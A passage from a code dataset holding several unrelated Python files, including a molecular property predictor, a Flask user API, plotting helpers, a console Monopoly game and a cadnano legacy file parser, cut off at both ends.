'/RandomForest_Regression_Morgan.pkl')\n if algorithmtype ==0:\n job = joblib.load(current_path + '/RandomForest_Regression_Morgan.pkl')\n elif algorithmtype ==1:\n job = joblib.load(current_path + '/SVM_Regression_Hybridization.pkl')\n elif algorithmtype == 2:\n job = joblib.load(current_path + '/gbdt.joblib')\n return job\n\ndef RegressionPredit(smiles, al):\n fingerprint = GetRdkitMorganFingerprint(smiles).reshape(1, 2048)\n if al == 1:\n fingerprint = GetCDKHybridizationFingerprint(smiles).reshape(1, 1024)\n elif al == 0:\n fingerprint = GetRdkitMorganFingerprint(smiles).reshape(1, 2048)\n elif al == 2:\n fingerprint = GetRdkitDaylightFingerprint(smiles).reshape(1, 1024)\n #fingerprint = GetRdkitMorganFingerprint(smiles).reshape(1, 2048)\n #print(fingerprint.shape)\n model = SelectAlgorithm(al)\n PCE = model.predict(fingerprint)\n #print(str(PCE[0]))\n return str(PCE[0])\n #prob = model.predict_proba(fingerprint)\n #target = model.predict(fingerprint)\n #return prob, target\n\n\nif __name__ == '__main__':\n smiles = 'O=C1C(C2=C(O)C=C(N(C(C)CC)CCC)C=C2O)=C([O-])/C1=C(C(O)=C/3)\\C(O)=CC3=[N+](CCC)\\C(C)CC'\n startJVM(getDefaultJVMPath(), \"-ea\")\n print(RegressionPredit(smiles, 0))\n #ClassifierPredit(smiles, 1)\n #prob = Regrepredit(smiles, 1)\n #print(type(str(prob[0][0])))\n #print(target)\n #predit(smiles,1)","sub_path":"predict/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"460484946","text":"# -*- coding:utf-8 -*-\n\nimport os\nimport sys\nimport codecs\nfrom utils import DataLoader\nimport time\nimport pickle\ndef load(qfile,d_dir,ofile,k):\n loader = DataLoader(ofile,qfile, d_dir)\n if loader.save(ofile):\n print('saved')\n #data = loader.loader(ofile)\n #print(type(data))\n else:\n print('fail')\n print('top_'+str(k)+' Done')\n\nif __name__ == '__main__':\n top_n = [10,50,100,150,200]\n qfile = './source/query_seg/query_low.txt'\n d_dir = './source/low_seg/top'\n o_file = './data/low/top'\n for k in top_n:\n load(qfile,d_dir+str(k),o_file+str(k)+'.pkl',k)\n #time.sleep(300)\n #with codecs.open(o_file+str(10)+'.pkl','rb') as fo:\n # data = pickle.load(fo)\n # print(type(data))\n #time.sleep(300) \n print('low_ done')\n \n qfile = './source/query_seg/query_med.txt'\n d_dir = './source/med_seg/top'\n o_file = './data/med/top'\n for k in top_n:\n load(qfile,d_dir+str(k),o_file+str(k)+'.pkl',k)\n print('med_ done')\n\n qfile = './source/query_seg/query_high.txt'\n d_dir = './source/high_seg/top'\n o_file = './data/high/top'\n for k in top_n:\n load(qfile,d_dir+str(k),o_file+str(k)+'.pkl',k)\n print('high_ done')\n\n \n","sub_path":"load.py","file_name":"load.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"82259822","text":"\"\"\"\n设置format()参数的值\n\"\"\"\n# 1.直接在format()中进行赋值\nstr01 = \"学校:{name},网址:{url}\".format(name=\"达内\", url=\"tts.tmooc,cn\")\nprint(str01)\n# 2.通过传递多值参数向format传递参数进而对{}进行赋值\n# 使用**传递字典\ndict01 = {\"name\": \"达内\", \"url\": \"tts.tmooc,cn\"}\nstr02 = \"学校:{name},网址:{url}\".format(**dict01)\nprint(str02)\n# 传递列表\nlist01 = [\"达内\", \"tts.tmooc,cn\"]\nstr03 = \"学校:{0[0]}, 网址:{0[1]}\".format(list01)\nprint(str03)\n# 传递多个列表\nlist02 = [\"百度\", \"tts.tmooc,cn\"]\nlist03 = [\"达内\", \"http:www.baidu.com\"]\nstr04 = \"学校:{1[0]}, 网址:{0[1]}\".format(list02, list03)\nprint(str04)\n# 传入对象\nclass Cat:\n def __init__(self, name):\n self.name = name\nclass Mouse:\n def __init__(self, name):\n self.name = name\ntom = Cat(\"Tom\")\njerry = Mouse(\"Jerry\")\nstr05 = \"{0.name} want to eat {1.name}\".format(tom, jerry)\nprint(str05)\n","sub_path":"test02.py","file_name":"test02.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"488136025","text":"import typing as t\nimport typing_extensions as tx\nimport time\nimport pathlib\nimport subprocess\nimport logging\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass ConnectionChecker(tx.Protocol):\n def ping(self) -> bool:\n \"\"\"is connected?\"\"\"\n ...\n\n def pong(self) -> bool:\n \"\"\"reply\"\"\"\n ...\n\n\nclass SentinelHandler(tx.Protocol):\n def create_sentinel(self) -> str:\n ...\n\n def inject_sentinel(self, argv: t.List[str], *, sentinel: str) -> t.List[str]:\n ...\n\n def create_connection_checker(self, *, sentinel: str) -> ConnectionChecker:\n ...\n\n\nclass FileSentinelHandler: # SentinelHandler\n def __init__(self, option_name: str = \"--sentinel\") -> None:\n self.option_name = option_name\n\n def inject_sentinel(self, argv: t.List[str], *, sentinel: str) -> t.List[str]:\n if sentinel in argv:\n logger.debug(\"sentinel %s is included in %s\", sentinel, argv)\n return argv\n return [*argv, self.option_name, sentinel]\n\n def create_sentinel(self) -> str:\n import tempfile\n\n fd, sentinel = tempfile.mkstemp()\n logger.info(\"create sentinel %s\", sentinel)\n return sentinel\n\n def create_connection_checker(self, *, sentinel: str) -> ConnectionChecker:\n return FileConnectionChecker(sentinel=sentinel)\n\n\nclass FileConnectionChecker: # ConnectionChecker\n def __init__(self, *, sentinel: str):\n self.sentinel = sentinel\n\n def ping(self) -> bool:\n return not pathlib.Path(self.sentinel).exists()\n\n def pong(self) -> bool:\n sentinel = self.sentinel\n if pathlib.Path(sentinel).exists():\n logger.info(\"remove sentinel %s\", sentinel)\n pathlib.Path(sentinel).unlink()\n return True\n return False\n\n\ndef spawn_with_connection(\n argv: t.List[str],\n *,\n handler: t.Optional[SentinelHandler] = None,\n sentinel: t.Optional[str] = None,\n sentinel_option: str = \"--sentinel\",\n retries: t.List[float] = [0.1, 0.2, 0.2, 0.4, 0.8, 1.6, 3.2, 6.4],\n check: bool = True,\n) -> t.Tuple[subprocess.Popen, ConnectionChecker]:\n handler = handler or FileSentinelHandler(sentinel_option)\n sentinel = sentinel or handler.create_sentinel()\n argv = handler.inject_sentinel(argv, sentinel=sentinel)\n\n logger.info(\"spawn process %r\", \" \".join(argv))\n p = subprocess.Popen(argv)\n\n checker = handler.create_connection_checker(sentinel=sentinel)\n\n if not check:\n return p, checker\n\n try:\n start_time = time.time()\n end_time = None\n\n for wait_time in retries:\n if checker.ping():\n end_time = time.time()\n logger.debug(\"connected\")\n break\n\n logger.debug(\"wait: %f\", wait_time)\n time.sleep(wait_time) # todo: backoff\n\n if end_time is None:\n raise TimeoutError(f\"{time.time() - start_time} sec passed, {p.args}\")\n return p, checker\n except Exception as exc:\n logger.warning(\"hmm %r, kill process\", exc)\n p.kill() # kill?\n raise\n","sub_path":"daily/20200606/example_egoist/01directives/spawn.py","file_name":"spawn.py","file_ext":"py","file_size_in_byte":3092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"27558436","text":"from flask import Flask, jsonify, request, send_file, send_from_directory\nimport logging\n\nfrom db import Db\nfrom user_dao import UserDao\n\napp = Flask(\"user_api\")\n# logging.basicConfig(level=logging.DEBUG)\n\n\n@app.route('/')\ndef get_index():\n \"\"\"\n Root Flask route to serve index.html\n\n Parameters: None\n\n Returns:\n Response: A Flask Response object containing index.html\n \"\"\"\n\n logging.info(\"Serving file index.html\")\n return send_file('index.html')\n\n\n@app.route(\"/images/\")\ndef get_image(filename):\n \"\"\"\n Flask route to serve the files located in the image directory\n\n Parameters:\n filename (str): The name of the file to access.\n\n Returns:\n Response: A Flask Response object containing the requested file\n \"\"\"\n\n logging.info(f\"Serving file images/{filename}\")\n return send_from_directory(\"images\", filename)\n\n\n@app.route('/user')\ndef get_user():\n \"\"\"\n Flask route that reads a DataTable request string and returns records in JSON format\n\n Parameters: None\n\n Returns:\n Response: A Flask Response object containing requested users encoded in the DataTable expected JSON format\n \"\"\"\n\n error_list = []\n user_dao = UserDao()\n\n # Get the parameters from the request URL\n draw = request.args.get('draw', default=1, type=int)\n start = request.args.get('start', default=0, type=int)\n length = request.args.get('length', default=25, type=int)\n sort_index = request.args.get('order[0][column]', default=0, type=str)\n sort_by = request.args.get('columns[' + sort_index + '][name]', type=str).lower()\n\n # Verify the order string\n if sort_by not in user_dao.columns:\n error_list.append(f\"Unable to sort on column {sort_by} as it was not found\")\n sort_by = user_dao.columns[0]\n\n # Sort in descending order when requested\n desc_flag = False\n if request.args.get('order[0][dir]', type=str) == \"desc\":\n desc_flag = True\n\n # Return the requested data in json format\n logging.info(f\"Serving user data (start={start}, length={length}, sort_by={sort_by})\")\n db = Db()\n count = user_dao.get_count(db)\n\n payload = {\n \"draw\": draw,\n \"recordsTotal\": count,\n \"recordsFiltered\": count\n }\n\n if len(error_list) == 0:\n payload[\"data\"] = user_dao.read(db, start, length, sort_by, desc_flag)\n else:\n payload[\"error\"] = '; '.join(error_list)\n\n return jsonify(payload)\n","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":2452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"123889382","text":"import numpy as np\n'''\n%COMPUTECOST Compute cost for linear regression\n% J = COMPUTECOST(X, y, theta) computes the cost of using theta as the\n% parameter for linear regression to fit the data points in X and y\n\n% Initialize some useful values\nm = length(y); % number of training examples\n\n% You need to return the following variables correctly\n'''\n\n\ndef computeCost(X, y, theta):\n # Initialize some useful values\n m = len(y) # number of training examples\n\n h_theta = np.dot(X, theta)\n err = h_theta - y\n J = (err**2).sum() / (2 * m)\n\n return J\n","sub_path":"hw_python/machine-learning-ex1/univariate linear regression/computeCost.py","file_name":"computeCost.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"397602167","text":"import os\nimport pytest\n\nimport testinfra.utils.ansible_runner\n\ntestinfra_hosts = testinfra.utils.ansible_runner.AnsibleRunner(\n os.environ['MOLECULE_INVENTORY_FILE']\n).get_hosts('all')\n\n\n@pytest.mark.parametrize('name,version', [\n ('policycoreutils-python', '2.5'),\n ('openssh-server', '7.4'),\n])\ndef test_packages(host, name, version):\n pkg = host.package(name)\n assert pkg.is_installed\n assert pkg.version.startswith(version)\n\n\ndef test_sshd_service_enabled_started(host):\n service = host.service('sshd')\n assert service.is_running\n assert service.is_enabled\n\n\n@pytest.mark.parametrize('name', [\n 'gitlab_gitlab-ce',\n 'gitlab_gitlab-ce-source',\n])\ndef test_gitlab_yum_repository(host, name):\n file = host.file('/etc/yum.repos.d/{0}.repo'.format(name))\n assert file.exists\n assert file.user == 'root'\n assert file.group == 'root'\n assert file.mode == 0o644\n assert file.contains('[{0}]'.format(name))\n","sub_path":"molecule/default/tests/test_default.py","file_name":"test_default.py","file_ext":"py","file_size_in_byte":954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"443627435","text":"import csv\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\n\n\nplt.style.use('ggplot')\nmpl.rcParams['text.color'] = 'black'\nmpl.rc('grid', linewidth=0.5, alpha=0.8, linestyle='-', color='#D3D3D3')\nmpl.rc('axes', facecolor='white')\nmpl.rc('boxplot', meanline=True, showmeans=True)\nmpl.rc('boxplot.meanprops', linestyle='-', linewidth=1.0)\nmpl.rc('boxplot.medianprops', linestyle='-', linewidth=1.0)\n\n\nclass Viz:\n @staticmethod\n def _save(fstr, **kwargs):\n plt.savefig(fstr, **kwargs)\n plt.close()\n\n @staticmethod\n def _format_legend(ax=None):\n if not ax:\n ax = plt.gca()\n\n box = ax.get_position()\n ax.set_position([box.x0, box.y0, box.width * 0.8, box.height])\n ax.legend(loc='center left', bbox_to_anchor=(1, 0.5))\n\n @staticmethod\n def _format_axes_label(ax=None, xlabel=None, ylabel=None):\n if not ax:\n ax = plt.gca()\n ax.set_xlabel(xlabel if xlabel else '')\n ax.set_ylabel(ylabel if ylabel else '')\n\n @staticmethod\n def _format_axes_ticks(xticks=None, yticks=None, xlabels=None, ylabels=None, x_rotation=0, y_rotation=0):\n plt.xticks(xticks, xlabels, rotation=x_rotation)\n plt.yticks(yticks, ylabels, rotation=y_rotation)\n\n @staticmethod\n def _format(ax=None, title=None, legend=None,\n xlabel=None, xticks=None, xlabels=None, xpad=None, xlim=None, x_rotation=0,\n ylabel=None, yticks=None, ylabels=None, ypad=None, ylim=None, y_rotation=0):\n\n if not ax:\n ax = plt.gca()\n\n if xticks is None:\n xticks = ax.get_xticks()\n if yticks is None:\n yticks = ax.get_yticks()\n\n if xlabels is None:\n xlabels = xticks\n if ylabels is None:\n ylabels = yticks\n\n if xlim:\n ax.set_xlim(xlim)\n if ylim:\n ax.set_ylim(ylim)\n\n if xpad:\n ax.tick_params(axis='x', which='major', pad=xpad)\n if ypad:\n ax.tick_params(axis='y', which='major', pad=ypad)\n\n if legend:\n Viz._format_legend(ax)\n\n Viz._format_axes_label(ax, xlabel, ylabel)\n Viz._format_axes_ticks(xticks, yticks, xlabels, ylabels, x_rotation, y_rotation)\n plt.title(title if title else '')\n\n @staticmethod\n def line(results, fstr, columns=None, index=None, **kwargs):\n df = pd.DataFrame(results, columns=columns, index=index)\n df.plot()\n Viz._format(**kwargs)\n Viz._save(fstr, bbox_inches='tight')\n\n @staticmethod\n def box(results, fstr, columns=None, index=None, **kwargs):\n df = pd.DataFrame(results, columns=columns, index=index)\n df.plot.box()\n Viz._format(**kwargs)\n Viz._save(fstr, bbox_inches='tight')\n\n @staticmethod\n def bar(results, fstr, columns=None, index=None, stacked=False, legend=True, xerr=None, yerr=None,\n colormap=None, color=None, horizontal=False, **kwargs):\n kwds = {}\n if colormap and color:\n kwds['color'] = color\n elif colormap:\n kwds['colormap'] = colormap\n elif color:\n kwds['color'] = color\n\n df = pd.DataFrame(results, columns=columns, index=index)\n if horizontal:\n df.plot.barh(stacked=stacked, legend=legend, xerr=xerr, yerr=yerr, **kwds)\n else:\n df.plot.bar(stacked=stacked, legend=legend, xerr=xerr, yerr=yerr, **kwds)\n Viz._format(legend=legend, **kwargs)\n Viz._save(fstr, bbox_inches='tight')\n\n @staticmethod\n def hist(results, fstr, columns=None, index=None, **kwargs):\n df = pd.DataFrame(results, columns=columns, index=index)\n df.plot.hist(colormap='Paired')\n Viz._format(**kwargs)\n Viz._save(fstr, bbox_inches='tight')\n\n @staticmethod\n def table(header, data, fstr):\n with open('{}.csv'.format(fstr), 'w') as f:\n writer = csv.writer(f)\n writer.writerow(header)\n writer.writerows(data)\n\n @staticmethod\n def error_bar(x, y, fstr, xerr=None, yerr=None, ecolor='r', marker='^', **kwargs):\n plt.errorbar(x, y, xerr=xerr, yerr=yerr, marker=marker, ecolor=ecolor)\n Viz._format(**kwargs)\n Viz._save(fstr, bbox_inches='tight')\n\n\nclass Visualize(Viz):\n def plot_intervals(self, actuals, predicted, data, rstr, **kwargs):\n x = np.arange(0, actuals.size)\n\n for n, ((low, high), c, nc) in enumerate(reversed(data)):\n yerr = actuals - low, high - actuals\n plt.errorbar(x, actuals, yerr=yerr, ecolor=c, color=c, linestyle='None', zorder=n, capthick=2,\n label='NC {}'.format(nc))\n\n for i, a in enumerate(actuals):\n plotted = False\n for (low, high), c, _ in data:\n if low[i] <= a <= high[i]:\n plotted = True\n plt.plot([i], [a], marker='o', color=c)\n plt.plot([i], [predicted[i]], marker='x', color='black')\n break\n\n if not plotted:\n plt.plot([i], [a], marker='o', color='red')\n\n ax = plt.gca()\n ax.grid(False)\n fig = plt.gcf()\n fig.set_size_inches(14, 8)\n\n self._format(**kwargs)\n self._save(rstr, bbox_inches='tight')\n\n","sub_path":"src/intervals/visualize.py","file_name":"visualize.py","file_ext":"py","file_size_in_byte":5345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"116922654","text":"from matplotlib import pyplot as plt\nimport random\nimport matplotlib\nfrom matplotlib import font_manager\n\n# windows下使用matplotlib.rc可以修改设置中文字体\n# mac,linux下使用matplotlib下的font_manager这只中文字体\n\n# 中文字体名称不好记或者不清楚\n# plt.rcParams['font.sans-serif']=['SimHei'] #用来正常显示中文标签\n# plt.rcParams['axes.unicode_minus']=False #用来正常显示坐标轴负号\n# #有中文出现的情况,需要u'内容'\n\n# font = {\n# 'family' : 'SimHei',\n# 'weight' : 'bold',\n# 'size' : '10'\n# }\n# matplotlib.rc('font', **font)\n\n# 这个是多个操作系统通用的 C:\\Windows\\Fonts\\simfang.ttf在windows下搜索字体,在查看字体的具体路径\nmy_font = font_manager.FontProperties(fname='C:\\Windows\\Fonts\\simfang.ttf')\n\nx = range(0,120)\ny = [random.randint(20,35) for i in range(120)]\n\nplt.figure(figsize=(20,8), dpi=80)\n\nxtick_lables = [ \"10:{}\".format(i) if i>9 else \"10:0\"+str(i) for i in range(60) ]\n\nxtick_lables += [ \"11点{}\".format(i) if i>9 else \"11:0\"+str(i) for i in range(60) ]\n# xtick_lables += [ \"11:{}\".format(i) for i in range(60) ]\n\n# 当x轴字符串表示刻度,xtick_lables保持与list(x)一样的步长则会代替前面的刻度,rotation表示轴刻度旋转度数\n# 中文字符在x周不显示,需要处理\nplt.xticks(list(x)[::5], xtick_lables[::5], rotation=45, fontproperties=my_font)\nplt.yticks(y)\nplt.plot(x, y, label='温度', c=\"blue\", linestyle=\"--\", linewidth=2, alpha=0.5)\nplt.plot(x, [i+1 for i in y], label=\"温度+\", c=\"red\")\n\n# 添加轴描述信息\nplt.xlabel(\"时间\",fontproperties=my_font)\nplt.ylabel(\"温度 单位℃\", fontproperties=my_font)\nplt.title(\"10点到12点的气温变化情况\", fontproperties=my_font)\n\n# 添加网格,alpha透明度\n# plt.grid(axis='x', color='b', linestyle='-')\nplt.grid(linestyle='-')\n\n# 添加图例,显示中文特殊的参数调用,图例显示位置,默认是best最合适的\nplt.legend(prop=my_font, loc=\"upper left\")\nplt.xlim((1,50))\nplt.show()","sub_path":"template.py","file_name":"template.py","file_ext":"py","file_size_in_byte":2027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"97068484","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Oct 3 10:55:40 2012\n\n@author: rohan\n\"\"\"\n\nimport dana ,numpy\n\n\nn=60\ndt=0.1\nalpha=10.0\ntau=1.0\nh=0.0\n\nI=dana.zeros((n,n))\nU=dana.zeros((n,n))\n\nU.connect(I.V,numpy.ones((1,1,)),'I',sparse=True)\n\nK = 1.25*dana.gaussian((2*n+1,2*n+1),0.1)- 0.7*dana.gaussian((2*n+1,2*n+1),1)\n\nU.connect(U.V,K,'L',shared=True)\n\nU.dV = U.dV = '-V + maximum(V+dt/tau*(-V+(L/(N*N)*10*10+I+h)/alpha),0)'\n\nI.V = dana.gaussian((N,N), 0.2, ( 0.5, 0.5))\nI.V += dana.gaussian((N,N), 0.2, (-0.5,-0.5))\nI.V += (2*numpy.random.random((N,N))-1)*.05\n\nfor i in range(250):\n focus.compute(dt)\n\n\ndana.pylab.view([input.V,focus.V]).show()","sub_path":"dana_test.py","file_name":"dana_test.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"56085943","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue May 8 12:55:21 2018\n\n@author: Joshua Hew\n\"\"\"\n# TODO: Test player in jail functions\n# TODO: Code end_player_turn function\n# TODO: Add better logging, figure out which information to log\n# TODO: Code chance and community chest tiles\n# TODO: Code owned property menu/ options\n\n\nimport menu_system as ms\nimport board\nimport dice\nimport player\n\nimport itertools\nimport logging\n\nlogging.basicConfig(filename='game_log.log', filemode='w', level=logging.DEBUG,\n format='%(levelname)s:%(msg)s')\n \nclass Game(object):\n \"\"\" Controls logic of game.\"\"\"\n \n def __init__(self):\n \n self.MAX_NUM_PLAYERS = 4 # Maximum number of players allowed\n self.player_list = [] # Players in game\n self.current_player = None # Current player/ player turn\n self.cp_cycle = None # Cycles through player_list\n self.round_counter = 0 # Number of rounds Game has cycled through\n self.dice = dice.Dice() # Game dice \n \n \n # Test logging \n logging.debug('Game Created') \n logging.info('Hello Log')\n \n # Setup Game \n print(\"Welcome to Console Monopoly!\")\n self.change_game_settings() \n \n # Create player cycler\n self.cp_cycle = itertools.cycle(self.player_list)\n \n # The first player created gets the first turn\n self.current_player = next(self.cp_cycle) \n \n # Start the main game loop\n self.main() \n\n \n \n def change_game_settings(self):\n \"\"\" Called by Game.init in order to setup game \"\"\"\n \n while True:\n # Display Game's Setup Menu: 1. Add Player. 2. Start Game\n print(\"\\n\\t\\t\\tSetup Menu: \")\n ms.display_menu(ms.setup_menu)\n \n # Collect user input. Menu option selection\n selection = input(\"Select an option by typing a number: \")\n \n # Choose option based on user input\n num_players = len(self.player_list) # Current amount of players in game\n if selection == '1': # Adds a Player to the game\n if num_players < self.MAX_NUM_PLAYERS: \n player_name = input(\"Please enter player name: \")\n self.player_list.append(player.Player(player_name))\n \n else:\n print(\"Error: Cannot have more than {} players!\".format( self.MAX_NUM_PLAYERS)) #DEBUG\n \n elif selection == '2': # Starts Game. There must be at least 1 player\n if num_players > 0:\n break\n \n else:\n print(\"Error: Cannot start game without players\")\n \n else:\n print(\"Unknown option selected!\")\n \n def start_player_turn(self, player):\n \"\"\" Monopoly consists of turns. Each turn a player can choose to do something \"\"\"\n \n \n if player.is_in_jail:\n # Default jail sentence time is 3 turns\n did_his_time = player.num_turns_in_jail == 3\n \n if did_his_time:\n # Move player from in_jail to 'just visiting'\n player.get_out_of_jail()\n \n print(\"{} has served his sentence. {} is now out of jail.\".format(player.name, \n player.name))\n logging.info(\"{} is out of jail.\".format(player.name))\n \n else:\n #increment current_player.num_turns_in_jail\n player.num_turns_in_jail += 1\n \n print(\"{} is serving jail sentence {} of 3.\".format(player.name, \n player.num_turns_in_jail))\n \n while player.is_in_jail:\n # Display in_jail_menu\n print(\"\\n\\t\\t\\tPlayer in Jail Menu: \")\n ms.display_menu(ms.player_in_jail_menu)\n \n # Collect user input. Menu option selection\n selection = input(\"Select an option by typing a number: \")\n \n # Select option\n if selection == '1': # 1. Roll Dice. Try to get doubles\n self.dice.roll()\n \n # If rolled doubles, player gets out of jail\n if self.dice.rolled_doubles:\n player.get_out_of_jail()\n \n else:\n # If player doesn't roll doubles, continue player turn cycle\n break\n \n # Reset dice for next use\n self.dice.reset()\n \n elif selection == '2': # 2. Use Get Out of Jail Free Card\n player.get_out_of_jail_free_card()\n \n # If player got out of jail, break out of in-jail-menu\n if player.is_in_jail == False:\n break\n \n # If player did not have card, start loop over \n else:\n continue\n \n elif selection == '3': # 3. Tough it out \n print(\"{} chose to tough it out.\".format(player.name))\n logging.info(\"{} chose to tough it out.\".format(player.name)) \n \n break\n \n else:\n print(\"Unknown option selected!\")\n \n \n elif player.is_bankrupt: \n # Remove player from game\n self.player_list.remove(player)\n \n else: # If player is neither bankrupt nor in jail\n while True:\n # Display player menu\n print(\"\\n\\t\\t\\tPlayer Menu:\")\n ms.display_menu(ms.player_menu)\n \n # Collect user input\n selection = input(\"Select an option by typing a number: \")\n \n # Choose option based on user input\n if selection == '1': # Roll Dice. Move player\n \n # Roll dice\n move_amount = self.dice.roll()\n \n # If player has rolled three doubles, go to jail\n if self.dice.doubles_counter == 3:\n player.go_to_jail()\n \n else: \n # Pass dice roll value to player's movement function\n player.move(move_amount)\n break\n \n # If player got sent to jail after moving, break out of player options\n if player.is_in_jail == False and self.dice.rolled_doubles:\n # PLayer gets to go again\n continue\n \n # Break out of player menu\n break\n \n \n elif selection == '2':\n player.display_owned_properties()\n \n # Let player see options again\n continue\n \n else:\n print(\"Unknown option selected!\")\n \n def end_player_turn(self, player):\n \n self.round_counter += 1\n self.current_player = next(self.cp_cycle)\n \n def main(self):\n \n self.round_counter = 1\n \n while True:\n print(\"Round {}.\".format(self.round_counter))\n print(\"Current Turn: {}.\".format(self.current_player.name))\n logging.info(\"Round {}\".format(self.round_counter))\n \n self.start_player_turn(self.current_player)\n self.end_player_turn(self.current_player)\n \n \n \nif __name__ == \"__main__\": \n \n Game()\n \n \n \n \n \n \n \n \n \n \n \n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"console_monopoly.py","file_name":"console_monopoly.py","file_ext":"py","file_size_in_byte":8576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"410821143","text":"import numpy as np\nimport math\n\nx = [2, -1, 3, -2, 2, 2, 1, -4, 5, 1] # input\nw = [-1, -1, 1, -1, 1, -1, 1, 1, -1, 1] # weight vector\n\nx_dot_w = np.dot(x,w) # -3\nprob_class_zero = 1-(1/(1+math.e**(-(-3))))\nprint(prob_class_zero) # 95% sure it's class 0 and 5% sure it's class 1\n\nx = np.multiply(0.05,x) # nudge x vectors in positive direction by multiplying with 0.05\n\nx_dot_w = np.dot(x,w)\nprob_class_zero = 1-(1/(1+math.e**(-(x_dot_w))))\nprint(prob_class_zero) # changed probability from 95% to 53% by 0.05 change","sub_path":"tutorial/binary_regression_example.py","file_name":"binary_regression_example.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"133331235","text":"# The MIT License\n#\n# Copyright (c) 2011 Wyss Institute at Harvard University\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n#\n# http://www.opensource.org/licenses/mit-license.php\n\n\"\"\"\njson_io.py\n\nCreated by Nick Conway on 2011-01-19.\n\nHouses code that parses legacy (cadnano1) files.l\n\"\"\"\n\nimport json\nfrom document import Document\nfrom dnahoneycombpart import DNAHoneycombPart\nfrom dnasquarepart import DNASquarePart\nfrom virtualhelix import VirtualHelix\nfrom enum import StrandType\n\n# from PyQt4.QtGui import QColor\nimport util\n# import Qt stuff into the module namespace with PySide, PyQt4 independence\nutil.qtWrapImport('QtGui', globals(), ['QColor'])\n\nNODETAG = \"node\"\nNAME = \"name\"\nOBJ_ID = \"objectid\"\nINST_ID = \"instanceid\"\nDONE = \"done\"\nCHECKED = \"check\"\nLOCKED = \"locked\"\n\nVHELIX = \"vhelix\"\nNUM = \"num\"\nCOL = \"col\"\nROW = \"row\"\nSCAFFOLD = \"scaffold\"\nSTAPLE = \"staple\"\nINSERTION = \"insertion\"\nDELETION = \"deletion\"\n\ndef doc_from_legacy_dict(obj):\n \"\"\"\n take a loaded legacy dictionary, returns a loaded Document\n \"\"\"\n doc = Document()\n part = DNAHoneycombPart() # TODO must generalize\n doc.addPart(part)\n part.setName(obj[\"name\"])\n #self.addVirtualHelixAt(coord, vh, requestSpecificIdnum=num, noUndo=True)\n numBases = len(obj['vstrands'][0]['scaf'])\n part.setDimensions((30, 32, numBases))\n for helix in obj['vstrands']:\n row = helix['row']\n col = helix['col']\n scaf= helix['scaf']\n vh = VirtualHelix(numBases=len(scaf), idnum=helix['num'])\n part.addVirtualHelixAt((row,col), vh, requestSpecificIdnum=helix['num'], noUndo=True)\n helixNo, numHelixes = -1, len(obj['vstrands'])\n for helix in obj['vstrands']:\n helixNo += 1\n # print \"helix %i/%i (%i%%)\"%(helixNo, numHelixes, helixNo*100/numHelixes)\n vh = part.getVirtualHelix(helix['num'])\n scaf = helix['scaf']\n stap = helix['stap']\n loops = helix['loop']\n skips = helix['skip']\n assert(len(scaf)==len(stap) and len(stap)==vh.numBases() and\\\n len(scaf)==len(loops) and len(loops)==len(skips))\n for i in range(len(scaf)):\n fiveVH, fiveIdx, threeVH, threeIdx = scaf[i]\n threeVH = part.getVirtualHelix(threeVH)\n # Installing an Xover works on the same strand\n # as well (there is nothing inherently different\n # between an Xover and a same-strand linkage\n # in our current model)\n if threeVH==-1 or threeIdx==-1:\n continue\n \n vh.installXoverFrom3To5(StrandType.Scaffold, i, threeVH, threeIdx, undoable=False, speedy=True)\n for i in range(len(stap)):\n fiveVH, fiveIdx, threeVH, threeIdx = stap[i]\n threeVH = part.getVirtualHelix(threeVH)\n if threeVH==-1 or threeIdx==-1:\n continue\n vh.installXoverFrom3To5(StrandType.Staple, i, threeVH, threeIdx, undoable=False, speedy=True)\n for baseIdx, colorNumber in helix['stap_colors']:\n color = QColor((colorNumber>>16)&0xFF, (colorNumber>>8)&0xFF, colorNumber&0xFF)\n 